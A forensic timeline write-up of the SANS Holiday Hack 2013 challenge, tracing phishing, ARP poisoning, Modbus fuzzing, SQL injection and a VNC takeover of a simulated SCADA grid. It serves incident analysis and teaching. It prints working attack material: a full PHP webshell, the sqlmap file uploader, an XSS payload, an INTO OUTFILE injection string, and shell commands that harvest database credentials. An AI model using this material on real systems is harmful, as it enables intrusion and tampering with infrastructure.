SANS Holiday Hack 2013 – Investigation Timeline


Published on February 20, 2014

Author: giacomo83m



PCAP file analysis of the successful and failed attacks on a simulated SCADA network. The work received an 'Honorable mention' from the SANS Institute.

Columns of the original timeline sheet: Wireshark StreamID, Frame N., UTC Date Time, Source, Destination, Port or Protocol, Event, Attack, Status, Analyst Comments, Evidence. Source, destination, host and URL values that are missing from the sheet are shown below as bracketed placeholders such as [host].

Frame 0 - 12/9/2013 20:53:01
  Event: First packet in CAP evidence.

Stream 3 - 12/11/2013 14:30:01 - HTTP
  Event: Website ValleyElectric; TrafficSystemNetworkMap.pdf and BedfordFallsTrainSystem.pdf downloaded.
  Status: None
  Analyst comments: The PDFs were checked with Wepawet and do not contain any malicious script. They contain a network description, summarized in the 'Assets' Excel tab.

Stream 55 - 12/11/2013 14:31:47 - HTTP
  Event: GET /pub/firefox/releases/26.0/update/win32/en-US/firefox-25.0.1-26.0.partial.mar
  Status: None
  Analyst comments: After the browser update the NoScript page is opened automatically.

Stream 63 - 12/11/2013 14:32:20 - POP
  Event: USER: dsawyer / PASS: Fashionista. From Fri Dec 06 10:53:05 2013 -0500. Delivered-To: [address].
  Attack: XSS. Cross-site scripting that injects JavaScript from [malicious domain]; the link in the mail carries the payload
    '><script src="[URL]">&elementId=31337&Si=maticModel=371200&ControlInterfaceEnabled&StationName=CPU1212C_ACD=CRly&OperatingMode=Run&ShowStatusColorYES
  Status: Failed
  Analyst comments: Malicious domain: it has the number 1 instead of the letter I. The Send Variable of the page is vulnerable to XSS attacks. The link was not clicked (no evidence!). NoScript blocks XSS attempts.
  Evidence (mail body): "I'm running around trying to take care of a bunch of tasks today. Can you monitor the Simatic S7-1200 PLC while I am out today? Just click the link below and keep the window open; if the controller shows "red", then let me know."
Frame 3792 - 12/11/2013 15:36:27 - ARP (many sources and destinations)
  Event: ARP sweep / network scan
  Attack: Recon
  Analyst comments: Enumerate IP addresses in [subnet].

Frame 4323 - 12/11/2013 15:36:29 - TCP (many sources and destinations)
  Event: Port sweep: 80, 443, 102, 502, 1089, 1090, 1091, 4000, 4848, 20000, 34962, 34963, 44818
  Attack: Recon
  Analyst comments: Enumerate the TCP services of [hosts].

Frame 4782 - 12/11/2013 15:37:08 - ARP (many destinations)
  Event: ARP reply (fake: ARP poisoning). Duplicate IP address detected for [IP] (00:0c:29:f7:f4:9a), also in use by 5c:86:4a:00:6c:02 (frame 4739).
  Attack: Man in the middle
  Status: Done
  Analyst comments: The attacker MAC address 00:0c:29:f7:f4:9a is in the ARP cache of all the target IP addresses enumerated above, so the attacker sniffs the communication between master and slaves.

Frame 5621 - 12/11/2013 15:38:01 - ARP
  Event: End of ARP poisoning.

Stream 159 - 12/11/2013 15:38:41 - HTTP
  Event: modscan_0.1.tar downloaded
  Attack: Recon
  Analyst comments: ModScan is a tool designed to map a SCADA Modbus TCP based network. It is written in Python for portability and can be used on virtually any system with few required libraries.

Stream 161 - 12/11/2013 15:39:58 (HTTP) and 15:39:59 (HTTPS)
  Event: Modbus fuzzer web page and protocol description; redirect to the Modbus web page [URL].
  Status: None

Streams 162 and 163 - 12/11/2013 15:40:16 - HTTP
  Event: Modbus ModLib fuzzer; redirect to [URL].
  Status: None

Stream 164 - 12/11/2013 15:40:16 - HTTPS
  Event: Download: [URL]
  Attack: Recon

Stream 165 - 12/11/2013 15:40:47
  Attack: Recon

12/11/2013 15:42:45 - Modbus 502/TCP
  Event: Transaction 2, Unit 0, Function 0 (Unknown)

Stream 168 - 12/11/2013 15:42:50 - Modbus 502/TCP
  Event: Modbus function 15: Write Multiple Coils. Exception: Slave device failure.
  Attack: SCADA Modbus fuzzing of the traffic grid controller at the corner of Main & Potter.
  Status: Failed
  Analyst comments: Function 15 failed; no coils have been modified. The downloaded library can be used as a Modbus fuzzer to send arbitrary and unexpected data to the Modbus server, and it is able to monitor the reaction of the server: if the Modbus server stops responding, it is assumed that the server stopped working properly. Besides packet generation, the sent network packets need to be recorded in order to repeat exceptions.

Stream 243 - 12/11/2013 17:51:01 - HTTP
  Event: indicator=F- LIMIT INTO OUTFILE var www tmpurykq.php LINES TERMINATED BY
  Attack: SQL injection
  Status: Done
  Analyst comments: sqlmap is used to exploit the SQL injection: a PHP file uploader is written to the remote web server by exploiting the vulnerable 'indicator' POST variable of the reports.php page.
  Evidence (content of tmpurykq.php):
    <?php if (isset($_REQUEST["upload"])){$dir=$_REQUEST["uploadDir"];
    if (phpversion()<'4.1.0'){$file=$HTTP_POST_FILES["file"]["name"];@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();}
    else{$file=$_FILES["file"]["name"];@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();}
    @chmod($dir."/".$file,0755);echo "File uploaded";}
    else {echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=/var/www> <input type=submit name=upload value=upload></form>";}?>

Stream 245 - 12/11/2013 17:51:02 - HTTP
  Event: POST of the webshell tmpbuase.php (Content-Disposition: form-data; name="file"; filename="tmpbuase.php")
  Status: Done
  Analyst comments: Second stage of the sqlmap exploitation: a webshell is uploaded to permit the attacker to execute remote commands.
  Evidence (content of tmpbuase.php):
    <?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);
    $z=@ini_get('disable_functions');
    if(!empty($z)){$z=preg_replace('/[, ]+/',',',$z);$z=explode(',',$z);$z=array_map('trim',$z);}else{$z=array();}
    $c=$c." 2>&1\n";
    function f($n){global $z;return is_callable($n)and!in_array($n,$z);}
    if(f('system')){ob_start();system($c);$w=ob_get_contents();ob_end_clean();}
    elseif(f('proc_open')){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}
    elseif(f('shell_exec')){$w=shell_exec($c);}
    elseif(f('passthru')){ob_start();passthru($c);$w=ob_get_contents();ob_end_clean();}
    elseif(f('popen')){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}
    elseif(f('exec')){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}
    else{$w=0;}
    print "<pre>".$w."</pre>";?>

Protocol note (Modbus/TCP, from the Recon rows above): Modbus is a stateless protocol and does not support authentication or encryption. Therefore the Modbus server will interpret and possibly answer every Modbus request it receives. The Modbus client (also called master) sends a request to the server (also called slave) and the server sends back either an answer, an exception, or nothing. In an answer to a read coils request, output 1 corresponds to the least significant bit (LSB) and output 5 to the fifth bit counting from the LSB; because the request asked for only 5 bits of data, three bits of the output byte (bits 6, 7 and 8) are unused.
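The following decoder is an added example, not code from the original report or from ModScan/ModLib: it parses a Modbus/TCP frame (MBAP header plus PDU), unpacks a Read Coils answer with the LSB-first bit layout described in the protocol note, and recognises exception responses such as the Write Multiple Coils "Slave device failure" recorded in stream 168. Both sample frames are constructed, not taken from the challenge PCAP.

```python
import struct

# Modbus exception codes relevant to the timeline (subset of the standard list)
EXCEPTIONS = {1: "Illegal function", 2: "Illegal data address",
              3: "Illegal data value", 4: "Slave device failure"}

def parse_mbap(frame):
    """Split a Modbus/TCP frame into its MBAP header fields and the PDU that follows."""
    if len(frame) < 8:
        raise ValueError("frame shorter than MBAP header plus function code")
    tid, pid, length, unit = struct.unpack(">HHHB", frame[:7])
    if pid != 0 or length != len(frame) - 6:  # length counts unit id + PDU
        raise ValueError("bad protocol id or length field")
    return {"transaction": tid, "unit": unit, "pdu": frame[7:]}

def decode_coils(data, count):
    """Coil 1 is bit 0 (LSB) of the first data byte; unused high bits are ignored."""
    return [bool(data[i // 8] >> (i % 8) & 1) for i in range(count)]

def decode_response(frame, requested_coils=0):
    """Describe a Modbus/TCP response: a normal answer or an exception."""
    info = parse_mbap(frame)
    pdu = info["pdu"]
    func = pdu[0]
    if func & 0x80:  # exception: function code echoed with bit 7 set, then the exception code
        code = pdu[1]
        info.update(function=func & 0x7F, exception=code,
                    reason=EXCEPTIONS.get(code, f"code {code}"))
    elif func == 1:  # Read Coils answer: byte count, then the packed coil bits
        info.update(function=1,
                    coils=decode_coils(pdu[2:2 + pdu[1]], requested_coils))
    else:
        info.update(function=func, raw=pdu[1:])
    return info

# Constructed frames: a Read Coils answer for 5 coils whose data byte is 0x13
# (0b00010011: coils 1, 2 and 5 on, bits 6-8 unused), and a Write Multiple Coils
# exception "Slave device failure" from unit 0, the shape of the stream 168 reply.
READ_COILS_OK = bytes.fromhex("000100000004" "01" "01" "01" "13")
WRITE_COILS_EXC = bytes.fromhex("000200000003" "00" "8f" "04")
```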

Stream 247 - 12/11/2013 17:51:10 - HTTP
  Event: $ ls
    alarms.php css/ denied.php footer.php header.php images/ index.php js/ login.php logout.php reports.php tmpbuase.php tmpurykq.php
  Status: Done
  Analyst comments: Directory listing using the webshell.

Stream 248 - 12/11/2013 17:51:13 - HTTP
  Event: $ grep mysql_connect *
    mysql_connect("localhost","wq-ro","publicworks")
  Status: Done
  Analyst comments: The attacker searches for and finds the MySQL credentials: USER wq-ro / PASS publicworks.

Stream 249 - 12/11/2013 17:51:30 - HTTP
  Event: echo "update measurement_levels set min=0 where id=4;" | mysql -u wq-ro -ppublicworks wq
  Status: Done
  Analyst comments: The attacker sets the 'min' value of the measurement_levels row with id 4 to 0. Reason?

Stream 250 - 12/11/2013 17:51:39 - HTTP
  Event: echo "select * from measurement_levels where id=4;" | mysql -u wq-ro -ppublicworks wq
    id:4 indicator_short:F indicator_long:Flouride measurement_type:ppm min:0 mcl:4 mclg:4
  Status: None
  Analyst comments: Verification of the UPDATE command described in stream 249. The previous attack was successful: the min value for id=4 is now zero.

Stream 252 - 12/11/2013 17:51:52 - HTTP
  Event: echo "update additives set amount=0 where id=4;" | mysql -u wq-ro -ppublicworks wq
    ERROR 1142 (42000) at line 1: UPDATE command denied to user 'wq-ro'@'localhost' for table 'additives'
  Attack: Attempt to change the Fluoride value
  Status: Failed
  Analyst comments: Permission denied (the web user does not have the grants for that operation).

Stream 253 - 12/11/2013 17:51:59 - HTTP
  Event: echo "select * from additives where indicator_id=4;" | mysql -u wq-ro -ppublicworks wq
    indicator_id:4 indicator_short:F amount:1.8
  Status: None

Frame 13143 - 12/12/2013 20:28:12 - ARP
  Event: ARP sweep
  Attack: Recon
  Analyst comments: Enumerate IP addresses in [subnet].

Frame 13681 - 12/21/2013 20:28:14 - ARP
  Event: ARP poisoning
  Attack: MITM
  Status: Failed
  Analyst comments: MITM stopped at 2013-12-12 20:34:04 (not a graceful shutdown). Failed (destination MAC address 00:00:00:00:00:00).

Frame 13737 - 12/12/2013 20:28:39 - TCP
  Event: Port sweep (SYN scan) from [IP] to [IP]
  Attack: Recon
  Analyst comments: Understand which services are open.

Frame 13749 / Stream 342 - 12/12/2013 20:28:39 - TCP (many sources and destinations)
  Event: Port sweep (SYN scan) from [IP] to [IP]
  Attack: Recon

Streams 344, 345, 346, 347 - 12/12/2013 21:30:40 - HTTP
  Event: guest login (default credentials); administrator login (default credentials); admin (default credentials); administrator (default credentials)
  Status: Failed (all four)
  Analyst comments: Online forum browsing to gather the MicroLogix 1100 default password: for full privileges the credentials are administrator/ml1100, for read-only privileges guest/guest. From Wireshark stream 347 to 363 the attacker continues the brute-force attack using many different passwords.

Stream 388 - 12/25/2013 3:10:55 - POP
  Event: USER: dsawyer / PASS: Fashionista. From Fri Dec 24 19:22:11 2013 -0400. Delivered-To: [address].
  Status: Done
  Analyst comments: Malicious sender already seen in the email analyzed in stream 63. The attack is successful: the link is opened in stream 389.
  Evidence (mail body): "A significant vulnerability in the Allen Bradley controller we are testing was just disclosed. I was able to grab the firmware update. Can you run this patch executable from the control host? The release notes say it will run silently to completion."

Stream 389 - 12/25/2013 3:11:05 - HTTP, TCP/8081
  Event: GET /ab-qfe.exe HTTP/1.1, Host: [malicious domain]
    HTTP/1.0 200 OK
    Server: SimpleHTTP/0.6 Python/2.7.5
    Date: Wed, 11 Dec 2013 23:17:28 GMT
    Last-Modified: Wed, 11 Dec 2013 17:16:49 GMT
  Status: Done
  Analyst comments: Malicious domain. The server date/time mismatches the frame time. The executable was uploaded 5 hours before the download. AB-QFE.EXE is a dropper: when executed it connects to [host]. It is related to the Metasploit Meterpreter reverse HTTPS payload (stream 390).

Stream 390 - 12/25/2013 3:11:18 - TCP/1225
  Event: Metasploit payload: Meterpreter HTTP/HTTPS communication (reverse_http/reverse_https)
  Status: Done

Stream 394 - 12/25/2013 3:11:52 - ARP
  Event: ARP sweep
  Attack: Recon
  Analyst comments: Enumerate IP addresses in [subnet].

Stream 449 - 12/25/2013 3:14:49 - SMB
  Event: Login, user OMyxDDzY
  Attack: Password authentication
  Status: Failed

Stream 450 - 12/25/2013 3:15:13 - SMB
  Event: Ernie login failed
  Attack: Password authentication
  Status: Failed

Stream 453 - 12/25/2013 3:15:13 - SMB
  Event: Ernie login successful ([host]$)
  Status: Done

Frame 18739 - 12/25/2013 3:15:42 - HTTP
  Event: Image update of the Axis Communications network camera
  Status: Done

Stream 454 - 12/25/2013 3:15:54 - SMB
  Event: WORKGROUP\Ernie successful login; access to [host]$; CreateFile PJzJEubs.exe; WriteFile (content); OpenSCManagerW; CreateServiceW ServiceName:QEwHRzjs DisplayName:MHaBRU; StartServiceW ServiceName:QEwHRzjs
  Status: Done
  Analyst comments: The attacker installs a malicious service that will load a backdoor (stream 459).

Stream 455 - 12/25/2013 3:16:01 - TCP/4444
  Event: Connection attempt (reverse connection to the backdoor): SYN/RST
  Status: Failed
  Analyst comments: Backdoor service started, but the port is still closed.

Stream 459 - 12/25/2013 3:16:01 - TCP/4444
  Event: [host] transfers a REFLECTIVELOADER DLL library to [host].
  Status: Done
  Analyst comments: Analysis of the sample suggests that the DLL is the VNC inject payload of the Metasploit Framework, windows/vncinject/bind_tcp: listen for a connection, inject a VNC DLL via a reflective loader. 4444 is the default TCP listening port.

Stream 460 - 12/25/2013 3:16:04 - VNC, TCP/4444
  Event: Opens a VNC (v3.8) connection to [host].
  Status: Done
  Analyst comments: The attacker shuts down the power grid and writes in Notepad "Merry Christmas, George Bailey, You Lose!".

Frame 24453 - 12/25/2013 3:16:23 - CIP
  Event: Common Industrial Protocol (SCADA) from the control panel to the Rockwell Automation system.
  Status: Done
  Analyst comments: SCADA commands to shut down the grid, executed by the control panel through the abusive VNC connection.

Frame 24596 - 12/25/2013 3:16:25 - CIP
  Event: SetAttribute
  Status: Done

12/25/2013 3:17:20 - TCP/4444
  Event: VNC connection closed.
  Status: Done

12/25/2013 3:17:26 - HTTP
  Event: Streaming update of the Axis Communications network camera. Last packet in CAP evidence.
  Status: None

Evidence of the VNC actions on the workstation display: please refer to the evidences.
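An added example, not part of the original report, that turns the two ARP observations in the timeline into a small monitor: it parses raw Ethernet/ARP reply frames, raises Wireshark's "duplicate IP address" condition when an IP that was first claimed by one MAC is later claimed by another (frame 4782), and flags replies addressed to 00:00:00:00:00:00, which update nobody's cache (the failed attempt at frame 13681). The sample frames are constructed; the IP addresses are placeholders, while the two MAC addresses are the ones quoted in the report.

```python
import struct

ARP_ETHERTYPE, ARP_REPLY, NULL_MAC = 0x0806, 2, "00:00:00:00:00:00"

def mac_str(b): return ":".join(f"{x:02x}" for x in b)
def ip_str(b): return ".".join(str(x) for x in b)

def parse_arp_reply(frame):
    """Return (sender_ip, sender_mac, target_ip, target_mac), or None if not an ARP reply."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ARP_ETHERTYPE:
        return None
    if struct.unpack("!HHBBH", frame[14:22]) != (1, 0x0800, 6, 4, ARP_REPLY):
        return None
    sha, spa, tha, tpa = frame[22:28], frame[28:32], frame[32:38], frame[38:42]
    return ip_str(spa), mac_str(sha), ip_str(tpa), mac_str(tha)

def monitor(frames):
    """Walk frames in capture order and return (frame_no, message) alerts."""
    seen = {}  # sender IP -> MAC first seen claiming it in an ARP reply
    alerts = []
    for n, frame in enumerate(frames, start=1):
        reply = parse_arp_reply(frame)
        if reply is None:
            continue
        sip, smac, _tip, tmac = reply
        if tmac == NULL_MAC:  # reply goes nowhere: the victim's cache is not updated
            alerts.append((n, f"reply for {sip} addressed to null MAC"))
        prev = seen.setdefault(sip, smac)
        if prev != smac:  # same IP now claimed by a second MAC (Wireshark's duplicate-IP warning)
            alerts.append((n, f"duplicate IP {sip}: {prev} also claimed by {smac}"))
    return alerts

def arp_reply(sha, spa, tha, tpa):
    """Build a constructed Ethernet/ARP reply frame (destination MAC = target MAC)."""
    eth = tha + sha + struct.pack("!H", ARP_ETHERTYPE)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY) + sha + spa + tha + tpa
    return eth + arp + b"\x00" * 18  # pad to the 60-byte Ethernet minimum

# Constructed sample: a legitimate reply, then the attacker claiming the same IP,
# then a reply addressed to 00:00:00:00:00:00. IPs are placeholders.
LEGIT_MAC = bytes.fromhex("5c864a006c02")     # the "also in use by" MAC in the report
ATTACKER_MAC = bytes.fromhex("000c29f7f49a")  # attacker MAC named in the report
VICTIM_MAC, IP_A, IP_B = bytes.fromhex("000000000001"), bytes([10, 0, 0, 1]), bytes([10, 0, 0, 10])
SAMPLE = [
    arp_reply(LEGIT_MAC, IP_A, VICTIM_MAC, IP_B),
    arp_reply(ATTACKER_MAC, IP_A, VICTIM_MAC, IP_B),
    arp_reply(ATTACKER_MAC, IP_A, b"\x00" * 6, IP_B),
]
```

Running `monitor(SAMPLE)` yields one duplicate-IP alert at frame 2 and both a null-MAC and a duplicate-IP alert at frame 3; the same loop applied to the frames of a real capture gives the defender the timestamp at which the cache was first poisoned.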
